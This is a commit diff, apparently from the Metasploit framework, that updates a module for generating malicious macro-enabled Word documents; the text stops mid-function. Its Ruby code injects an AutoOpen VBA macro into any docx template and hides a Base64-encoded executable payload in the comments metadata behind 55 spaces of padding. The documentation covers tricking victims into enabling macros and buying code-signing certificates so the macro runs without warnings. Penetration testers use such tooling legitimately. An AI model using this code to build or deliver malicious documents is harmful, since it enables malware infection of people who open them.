Update office_word_macro exploit to support template injection

2024-07-18 18:31:41 +02:00 · 2017-05-25 15:53:45 -05:00 · 2017-05-25 15:53:45 -05:00 · ee13195760
commit ee13195760
parent e4ea618edf
19 changed files with 273 additions and 101 deletions
--- a/data/exploits/office_word_macro/[Content_Types].xml
+++ b/data/exploits/office_word_macro/[Content_Types].xml
@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>
--- a/data/exploits/office_word_macro/_rels/__rels
+++ b/data/exploits/office_word_macro/_rels/__rels
@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>
--- a/data/exploits/office_word_macro/core.xml
+++ b/data/exploits/office_word_macro/core.xml
@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+  <dc:title/>
+  <dc:subject/>
+  <dc:creator/>
+  <cp:keywords/>
+  <dc:description></dc:description>
+  <cp:lastModifiedBy>Nobody</cp:lastModifiedBy>
+  <cp:revision>1</cp:revision>
+  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
+  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
+  <cp:category/>
+</cp:coreProperties>
--- a/data/exploits/office_word_macro/docProps/app.xml
+++ b/data/exploits/office_word_macro/docProps/app.xml
@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>105</TotalTime><Pages>1</Pages><Words>1</Words><Characters>10</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>10</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>15.0000</AppVersion></Properties>
--- a/data/exploits/office_word_macro/docProps/core.xml
+++ b/data/exploits/office_word_macro/docProps/core.xml
@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Windows User</dc:creator><cp:keywords></cp:keywords><dc:description>                                                       PAYLOADGOESHERE</dc:description><cp:lastModifiedBy>Windows User</cp:lastModifiedBy><cp:revision>32</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-02-01T20:39:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-02T22:26:00Z</dcterms:modified></cp:coreProperties>
--- a/data/exploits/office_word_macro/template.docx
+++ b/data/exploits/office_word_macro/template.docx
--- a/data/exploits/office_word_macro/word/vbaData.xml
+++ b/data/exploits/office_word_macro/word/vbaData.xml
@ -1,2 +1,2 @@
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
--- a/data/exploits/office_word_macro/vbaProject.bin
+++ b/data/exploits/office_word_macro/vbaProject.bin
--- a/data/exploits/office_word_macro/word/_rels/vbaProject.bin.rels
+++ b/data/exploits/office_word_macro/word/_rels/vbaProject.bin.rels
--- a/data/exploits/office_word_macro/word/_rels/document.xml.rels
+++ b/data/exploits/office_word_macro/word/_rels/document.xml.rels
@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>
--- a/data/exploits/office_word_macro/word/document.xml
+++ b/data/exploits/office_word_macro/word/document.xml
@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><w:body><w:p w:rsidR="00A31ED0" w:rsidRDefault="00366A6C"><w:bookmarkStart w:id="0" w:name="_GoBack"/><w:bookmarkEnd w:id="0"/><w:r><w:t>DOCBODYGOESHER</w:t></w:r></w:p><w:sectPr w:rsidR="00A31ED0"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
--- a/data/exploits/office_word_macro/word/fontTable.xml
+++ b/data/exploits/office_word_macro/word/fontTable.xml
@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E10002FF" w:usb1="4000ACFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/></w:font></w:fonts>
--- a/data/exploits/office_word_macro/word/settings.xml
+++ b/data/exploits/office_word_macro/word/settings.xml
@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15"><w:zoom w:percent="100"/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/></w:compat><w:rsids><w:rsidRoot w:val="0075759D"/><w:rsid w:val="000446F5"/><w:rsid w:val="00364989"/><w:rsid w:val="00366A6C"/><w:rsid w:val="003925D3"/><w:rsid w:val="00472204"/><w:rsid w:val="004929CB"/><w:rsid w:val="004937C6"/><w:rsid w:val="004E70C7"/><w:rsid w:val="00556042"/><w:rsid w:val="005C1470"/><w:rsid w:val="00634AFC"/><w:rsid w:val="0075759D"/><w:rsid w:val="008352C1"/><w:rsid w:val="008D18EE"/><w:rsid w:val="008F274A"/><w:rsid w:val="009337EB"/><w:rsid w:val="00965754"/><w:rsid w:val="00A31ED0"/><w:rsid w:val="00AA0D43"/><w:rsid w:val="00BD14BB"/><w:rsid w:val="00C22BA6"/><w:rsid w:val="00D4037B"/><w:rsid w:val="00DD6E1E"/><w:rsid w:val="00E636EA"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w15:chartTrackingRefBased/><w15:docId w15:val="{0E28A8EC-7E3E-41BD-9D1E-ADE8B995AEE4}"/></w:settings>
--- a/data/exploits/office_word_macro/word/styles.xml
+++ b/data/exploits/office_word_macro/word/styles.xml
--- a/data/exploits/office_word_macro/word/theme/theme1.xml
+++ b/data/exploits/office_word_macro/word/theme/theme1.xml
--- a/data/exploits/office_word_macro/word/vbaProject.bin
+++ b/data/exploits/office_word_macro/word/vbaProject.bin
--- a/data/exploits/office_word_macro/word/webSettings.xml
+++ b/data/exploits/office_word_macro/word/webSettings.xml
@ -1,2 +0,0 @@
-<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15"><w:optimizeForBrowser/><w:relyOnVML/><w:allowPNG/></w:webSettings>
--- a/documentation/modules/exploit/multi/fileformat/office_word_macro.md
+++ b/documentation/modules/exploit/multi/fileformat/office_word_macro.md
@ -1,13 +1,16 @@

 ## Description

-This module generates a macro-enabled Microsoft Office Word document. It does not target a specific
-CVE or vulnerability, this is more of a feature-abuse in Office, however this type of
-social-engineering attack still remains common today.
+This module generates a macro-enabled Microsoft Office Word document (docm). It does not target a
+specific CVE or vulnerability, instead it's more of a feature-abuse in Office, and yet it's still a
+popular type of social-engineering attack such as in ransomware.

-There are many ways to create this type of malicious doc. The module injects the Base64-encoded
-payload in the comments field, which will get decoded back by the macro and executed as a Windows
-executable when the Office document is launched.
+By default, the module uses a built-in Office document (docx) as the template. It injects the
+Base64-encoded payload into the comments field, which will get decoded back by the macro and executed
+as a Windows executable when the Office document is launched.
+
+If you do not wish to use the built-in docx template, you can also choose your own. Please see more
+details below.


 ## Vulnerable Application
@ -22,58 +25,74 @@ Specifically, this module was tested specifically against:
 * Microsoft Office 2016.
 * Microsoft Office Word 15.29.1 (161215).

+## Building the Office Document Template
+
+It is recommended that you build your Office document (docx) template from either one of these
+applications:
+
+* Google Docs
+* Microsoft Office Word
+
+**Google Docs**
+
+Google Docs is ideal in case you don't have Microsoft Office available.
+
+Before you start, make sure you have a Gmail account.
+
+Next, to create a new document, please go to the following:
+
+[https://docs.google.com/document/?usp=mkt_docs](https://docs.google.com/document/?usp=mkt_docs)
+
+To save the document as a docx on Google docs:
+
+1. Click on File
+2. Go to Download as
+3. Click on Microsoft Word (.docx)
+
+**Microsoft Office Word**
+
+If you already have Microsoft Office, you can use it to create a docx file and use it as a template.
+
+
 ## Verification Steps

+**To use the default template**
+
 1. ```use exploit/multi/fileformat/office_word_macro```
 2. ```set PAYLOAD [PAYLOAD NAME]```
-3. Configure the rest of the settings accordingly (BODY, LHOST, LPORT, etc)
+3. Configure the rest of the settings accordingly (LHOST, LPORT, etc)
 4. ```exploit```
 5. The module should generate the malicious docm.

+**To use the custom template**
+
+1. ```use exploit/multi/fileformat/office_word_macro```
+2. ```set PAYLOAD [PAYLOAD NAME]```
+3. ```set CUSTOMTEMPLATE [DOCX PATH]```
+4. Configure the rest of the settings accordingly
+5. ```exploit```
+6. The module should generate the malicious docm.
+
 ## Options

-**BODY** Text to put in the Office document. See **Modification** below if you wish to modify more.
-
-## Demo
-
-In this example, first we generate the malicious docm exploit, and then we set up a
-windows/meterpreter/reverse_tcp handler to receive a session. Next, we copy the docm
-exploit to a Windows machine with Office 2013 installed, when the document runs the
-macro, we get a session:
-
-![macro_demo](https://cloud.githubusercontent.com/assets/1170914/22602348/751f9d66-ea08-11e6-92ce-4e52f88aaebf.gif)
-
-## Modification
-
-To use this exploit in a real environment, you will most likely need to modify the docm content.
-Here's one approach you can do:
-
-1. Use the module to generate the malicious docm
-2. Copy the malicious docm to the vulnerable machine, and edit it with Microsoft Office (such as 2013).
-   When you open the document, the payload will probably do something on your machine. It's ok,
-   since you generated it, it should not cause any problems for you.
-3. Save the doc, and test again to make sure the payload still works.
-
-While editing, you should avoid modifying the following unless you are an advanced user:
-
-* The comments field. If you have to modify this, make sure to create 55 empty spaces
-  in front of the payload string. The blank space is for making the payload less obvious
-  at first sight if the user views the file properties.
-* The VB code in the macro.
+**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.

 ## Trusted Document

 By default, Microsoft Office does not execute macros automatically unless it is considered as a
 trusted document. This means that if a macro is present, the user will most likely need to manually
-click on the "Enable Content" button in order to run the macro.
+click on the "Enable Content" or "Enable Macro" button in order to run the macro.

 Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick
 the user into allowing the macro to run. For example, making the document look like something
 written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory).

-To truly make the macro document to run without any warnings, you must somehow figure out a way to
+To truly make the macro document run without any warnings, you must somehow figure out a way to
 sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts.

+If money is not an issue, you can easily buy a certificate on-line:
+[https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html](https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html)
+
 For testing purposes, another way to have a certificate is to create a self-signed one using
 Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on
 Windows:
--- a/modules/exploits/multi/fileformat/office_word_macro.rb
+++ b/modules/exploits/multi/fileformat/office_word_macro.rb
@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
    super(update_info(info,
      'Name'           => "Microsoft Office Word Malicious Macro Execution",
      'Description'    => %q{
-        This module generates a macro-enabled Microsoft Office Word document. The comments
-        metadata in the data is injected with a Base64 encoded payload, which will be
+        This module injects a malicious macro into a Microsoft Office Word document (docx). The
+        comments field in the metadata is injected with a Base64 encoded payload, which will be
        decoded by the macro and execute as a Windows executable.

        For a successful attack, the victim is required to manually enable macro execution.
@ -56,64 +56,226 @@ class MetasploitModule < Msf::Exploit::Remote
    ))

    register_options([
-      OptString.new("BODY", [false, 'The message for the document body',
-        'Contents of this document are protected. Please click Enable Content to continue.'
-      ]),
-      OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
+      OptPath.new("CUSTOMTEMPLATE", [false, 'A docx file that will be used as a template to build the exploit']),
+      OptString.new('FILENAME', [true, 'The Office document macro file (docm)', 'msf.docm'])
    ])
  end

+  def get_file_in_docx(fname)
+    i = @docx.find_index { |item| item[:fname] == fname }

-  def on_file_read(short_fname, full_fname)
-    buf = File.read(full_fname)
-
-    case short_fname
-    when /document\.xml/
-      buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
-    when /core\.xml/
-      p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
-      b64_payload = ' ' * 55
-      b64_payload << Rex::Text.encode_base64(p)
-      buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
+    unless i
+      fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}")
    end

-    # The original filename of __rels is actually ".rels".
-    # But for some reason if that's our original filename, it won't be included
-    # in the archive. So this hacks around that.
-    case short_fname
-    when /__rels/
-      short_fname.gsub!(/\_\_rels/, '.rels')
-    end
-
-    yield short_fname, buf
+    @docx.fetch(i)[:data]
  end

+  def add_content_type_extension(extension, content_type)
+    if has_content_type_extension?(extension)
+      update_content_type("Types//Default[@Extension=\"#{extension}\"]", 'ContentType', content_type)
+    else
+      xml = get_file_in_docx('[Content_Types].xml')
+      types_node = xml.at('Types')

-  def package_docm(path)
-    zip = Rex::Zip::Archive.new
+      unless types_node
+        fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.')
+      end

-    Dir["#{path}/**/**"].each do |file|
-      p = file.sub(path+'/','')
+      child_data = "<Default Extension=\"#{extension}\" ContentType=\"#{content_type}\"/>"
+      types_node.add_child(child_data)
+    end
+  end

-      if File.directory?(file)
-        print_status("Packaging directory: #{file}")
-        zip.add_file(p)
-      else
-        on_file_read(p, file) do |fname, buf|
-          print_status("Packaging file: #{fname}")
-          zip.add_file(fname, buf)
+  def has_content_type_extension?(extension)
+    xml = get_file_in_docx('[Content_Types].xml')
+    xml.at("Types//Default[@Extension=\"#{extension}\"]") ? true : false
+  end
+
+  def add_content_type_partname(part_name, content_type)
+    ctype_xml = get_file_in_docx('[Content_Types].xml')
+    types_node = ctype_xml.at('Types')
+
+    unless types_node
+      fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.')
+    end
+
+    child_data = "<Override PartName=\"#{part_name}\" ContentType=\"#{content_type}\"/>"
+    types_node.add_child(child_data)
+  end
+
+  def update_content_type(pattern, attribute, new_value)
+    ctype_xml = get_file_in_docx('[Content_Types].xml')
+    doc_xml_ctype_node = ctype_xml.at(pattern)
+    if doc_xml_ctype_node
+      doc_xml_ctype_node.attributes[attribute].value = new_value
+    end
+  end
+
+  def add_rels_relationship(type, target)
+    rels_xml = get_file_in_docx('_rels/.rels')
+    relationships_node = rels_xml.at('Relationships')
+
+    unless relationships_node
+      fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node')
+    end
+
+    last_index = get_last_relationship_index_from_rels
+    relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
+  end
+
+  def add_doc_relationship(type, target)
+    rels_xml = get_file_in_docx('word/_rels/document.xml.rels')
+    relationships_node = rels_xml.at('Relationships')
+
+    unless relationships_node
+      fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node.')
+    end
+
+    last_index = get_last_relationship_index_from_doc_rels
+    relationships_node.add_child("<Relationship Id=\"rId#{last_index+1}\" Type=\"#{type}\" Target=\"#{target}\"/>")
+  end
+
+  def get_last_relationship_index_from_rels
+    rels_xml = get_file_in_docx('_rels/.rels')
+    relationships_node = rels_xml.at('Relationships')
+
+    unless relationships_node
+      fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node')
+    end
+
+    relationships_node.search('Relationship').collect { |n|
+      n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i
+    }.max
+  end
+
+  def get_last_relationship_index_from_doc_rels
+    rels_xml = get_file_in_docx('word/_rels/document.xml.rels')
+    relationships_node = rels_xml.at('Relationships')
+
+    unless relationships_node
+      fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node')
+    end
+
+    relationships_node.search('Relationship').collect { |n|
+      n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i
+    }.max
+  end
+
+  def inject_macro
+    add_content_type_extension('bin', 'application/vnd.ms-office.vbaProject')
+    add_content_type_partname('/word/vbaData.xml', 'application/vnd.ms-word.vbaData+xml')
+
+    pattern = 'Override[@PartName="/word/document.xml"]'
+    attribute_name = 'ContentType'
+    scheme = 'application/vnd.ms-word.document.macroEnabled.main+xml'
+    update_content_type(pattern, attribute_name, scheme)
+
+    scheme = 'http://schemas.microsoft.com/office/2006/relationships/vbaProject'
+    fname = 'vbaProject.bin'
+    add_doc_relationship(scheme, fname)
+
+    @docx << { fname: 'word/vbaData.xml', data: get_vbadata_xml }
+    @docx << { fname: 'word/_rels/vbaProject.bin.rels', data: get_vbaproject_bin_rels}
+    @docx << { fname: 'word/vbaProject.bin', data: get_vbaproject_bin}
+  end
+
+  def get_vbadata_xml
+    File.read(File.join(macro_resource_directory, 'vbaData.xml'))
+  end
+
+  def get_vbaproject_bin_rels
+    File.read(File.join(macro_resource_directory, 'vbaProject.bin.rels'))
+  end
+
+  def get_vbaproject_bin
+    File.read(File.join(macro_resource_directory, 'vbaProject.bin'))
+  end
+
+  def get_core_xml
+    File.read(File.join(macro_resource_directory, 'core.xml'))
+  end
+
+  def create_core_xml_file
+    add_content_type_partname('/docProps/core.xml', 'application/vnd.openxmlformats-package.core-properties+xml')
+    add_rels_relationship('http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties', 'docProps/core.xml')
+    @docx << { fname: 'docProps/core.xml', data: Nokogiri::XML(get_core_xml) }
+  end
+
+  def inject_payload
+    p  = padding = ' ' * 55
+    p << Rex::Text.encode_base64(target.name =~ /Python/i ? payload.encoded : generate_payload_exe)
+
+    begin
+      core_xml = get_file_in_docx('docProps/core.xml')
+    rescue Msf::Exploit::Failed
+    end
+
+    unless core_xml
+      print_status('Missing docProps/core.xml to inject the payload to. Using the default one.')
+      create_core_xml_file
+      core_xml = get_file_in_docx('docProps/core.xml')
+    end
+
+    description_node = core_xml.at('//cp:coreProperties//dc:description')
+    description_node.content = p
+  end
+
+  def unpack_docx(template_path)
+    doc = []
+
+    Zip::File.open(template_path) do |entries|
+      entries.each do |entry|
+        if entry.name.match(/\.xml|\.rels$/i)
+          content = Nokogiri::XML(entry.get_input_stream.read)
+        else
+          content = entry.get_input_stream.read
        end
+
+        vprint_status("Parsing item from template: #{entry.name}")
+
+        doc << { fname: entry.name, data: content }
      end
    end

-    zip.pack
+    doc
  end

+  def pack_docm
+    @docx.each do |entry|
+      if entry[:data].kind_of?(Nokogiri::XML::Document)
+        entry[:data] = entry[:data].to_s
+      end
+    end
+
+    Msf::Util::EXE.to_zip(@docx)
+  end
+
+  def macro_resource_directory
+    @macro_resource_directory ||= File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
+  end
+
+  def get_template_path
